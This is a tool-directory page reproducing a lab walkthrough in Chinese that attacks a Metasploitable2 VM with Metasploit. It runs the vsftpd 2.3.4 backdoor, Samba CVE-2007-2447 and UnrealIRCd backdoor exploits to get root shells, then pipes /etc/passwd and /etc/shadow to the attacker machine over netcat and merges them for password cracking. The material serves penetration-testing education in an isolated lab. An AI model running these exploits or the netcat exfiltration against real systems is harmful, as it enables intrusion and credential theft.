Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
metasploitable2-exploitation-metasploit — 针对 Metasploitable2 的完整 Metasploit 利用演练 — vsftpd 后门、Samba CVE-2007-2447、UnrealIRCd 后门、Netcat 数据外泄和凭据破解准备。 | Kitploit
工具/GitHubGitHub/ethicalhackinglabs/metasploitable2-exploitation-metasploit
密码破解侦察漏洞利用框架网络映射漏洞分析漏洞利用数据泄露渗透测试命令与控制

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
学习与教育
Payload 开发
实验室与实践
GitHubethicalhackinglabs/metasploitable2-exploitation-metasploit

metasploitable2-exploitation-metasploit

针对 Metasploitable2 的完整 Metasploit 利用演练 — vsftpd 后门、Samba CVE-2007-2447、UnrealIRCd 后门、Netcat 数据外泄和凭据破解准备。

查看仓库
82个月前尚未审核

使用Metasploit攻击Metasploitable2:VSFTPD、Samba等

一份利用Metasploit框架进行渗透测试的实操指南——从PostgreSQL数据库设置和db_nmap扫描开始,通过vsftpd、Samba和UnrealIRCd获取三个root shell,再到使用Netcat提取凭据。


概述

本仓库记录了在一个隔离的VirtualBox实验室中对Metasploitable2进行的完整Metasploit攻击过程。涵盖主题:

  • 设置带PostgreSQL后端和工作区的Metasploit
  • 运行db_nmap将扫描结果直接保存到数据库
  • 利用vsftpd 2.3.4后门(供应链攻击)
  • 利用Samba CVE-2007-2447(usermap_script命令注入)
  • 通过Netcat提取/etc/passwd和/etc/shadow并用unshadow合并
  • 利用UnrealIRCd 3.2.8.1后门

实验环境

机器角色IP地址
Kali Linux 2026.1攻击机192.168.1.4
Metasploitable2目标机192.168.1.3

网络:192.168.1.0/24 — VirtualBox内完全隔离的NAT网络。


步骤1 — Metasploit设置与数据库支持的扫描

root@kitploit:~
# 启动PostgreSQL并初始化数据库(仅一次)
sudo systemctl start postgresql
sudo msfdb init

# 启动Metasploit
msfconsole

Kali和Metasploitable2运行中

Kali更新及PostgreSQL启动

root@kitploit:~
msf6> db_status           # 验证:已连接到msf。连接类型:postgresql。
msf6> workspace -a 178-metasploitable2
msf6> workspace           # 确认当前工作区

db_status和workspace输出

root@kitploit:~
msf6> db_nmap -A 192.168.1.0/24 -n

db_nmap扫描进行中

root@kitploit:~
msf6> hosts
msf6> services

hosts和services输出

在Metasploitable2上发现两个FTP服务器:

端口服务信息
21/tcpftpvsftpd 2.3.4
2121/tcpftpProFTPD 1.3.1

步骤2 — 利用vsftpd 2.3.4(后门)

2011年7月,vsftpd 2.3.4的源代码压缩包被篡改——植入了一个后门,当FTP用户名包含:)时,会在端口6200上打开一个root shell。CVE编号:CVE-2011-2523。代码差异:https://pastebin.com/AetT9sS5

root@kitploit:~
msf6> search type:exploit name:vsftpd
# 结果:exploit/unix/ftp/vsftpd_234_backdoor  (rank: excellent)

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info

vsftpd漏洞信息 - 第1部分

vsftpd漏洞信息 - 第2部分

vsftpd显示选项

vsftpd设置RHOSTS RPORT LHOST

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit

vsftpd漏洞执行及Meterpreter会话

远程根文件系统上的ls输出

root@kitploit:~
meterpreter> shell
whoami          # root
uname -a        # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

whoami显示root及uname -a输出

提取哈希密码:

root@kitploit:~
cat /etc/shadow | grep '$1'

shadow文件中的哈希密码


步骤3 — 利用Samba CVE-2007-2447

Samba 3.0.0–3.0.25rc3版本会将用户名中的shell元字符直接传递给/bin/sh(通过username map script选项)——在认证之前发生。Metasploitable2运行的是Samba 3.0.20-Debian。

root@kitploit:~
msf6> search type:exploit name:samba
# 发现约7个漏洞

msf6> use exploit/multi/samba/usermap_script
msf6> info

搜索Samba漏洞列表

Samba usermap_script信息

Samba CVE描述及参考信息

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> exploit

Samba漏洞执行 - 会话打开

Samba shell中whoami显示root及smbd --version

root@kitploit:~
whoami          # root
smbd --version  # Version 3.0.20-Debian

Netcat文件外传

标签页2 — Kali(接收端):

root@kitploit:~
nc -l -p 4567 > passwd.txt

标签页1 — 漏洞利用shell(发送端):

root@kitploit:~
cat /etc/passwd | nc 192.168.1.4 4567

Kali上Netcat监听接收passwd

外传后的passwd.txt内容

重复操作提取/etc/shadow,然后合并:

root@kitploit:~
unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt

步骤4 — 利用UnrealIRCd 3.2.8.1(后门)

UnrealIRCd 3.2.8.1的源代码中内置了一个后门。向端口6667发送AB会导致服务器以root权限执行后续任意命令——无需认证。

root@kitploit:~
msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit

UnrealIRCd漏洞选项及执行

UnrealIRCd root shell - whoami和uname -a

root@kitploit:~
whoami   # root
uname -a # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

必需选项:

选项

Metasploit工作流程一览

root@kitploit:~
db_nmap → hosts → services → search → use → info → show options → set → exploit → shell

常见错误


关键要点

  • vsftpd 2.3.4和UnrealIRCd 3.2.8.1都是供应链攻击——后门被植入官方分发存档中
  • Samba的CVE-2007-2447在认证前触发——唯一缓解措施是打补丁
  • Netcat无依赖,可在几乎所有Unix系统上用于文件外传
  • info在exploit之前使用是一个值得养成的习惯——它会显示CVE、受影响版本和必需选项

🌐 与我联系

LinkedIn Dev.to

下载工具
值
描述
RHOSTS192.168.1.3目标IP
RPORT6667IRC默认端口
LHOST192.168.1.4Kali监听IP
payloadcmd/unix/bind_netcat通过Netcat绑定shell
错误后果修复方法
跳过msfdb init无数据库——扫描结果未保存首次使用前运行sudo msfdb init
未设置LHOST反弹shell无处回连始终将LHOST设为你的Kali IP
每次会话都运行msfdb init覆盖已有数据仅运行一次;使用sudo msfdb status检查
RPORT设置错误漏洞利用静默失败设置前通过services确认端口
过早关闭Netcat监听文件传输不完整管道命令后等待片刻再按CTRL-C
跳过unshadow密码破解工具拒绝拆分文件格式务必先合并passwd和shadow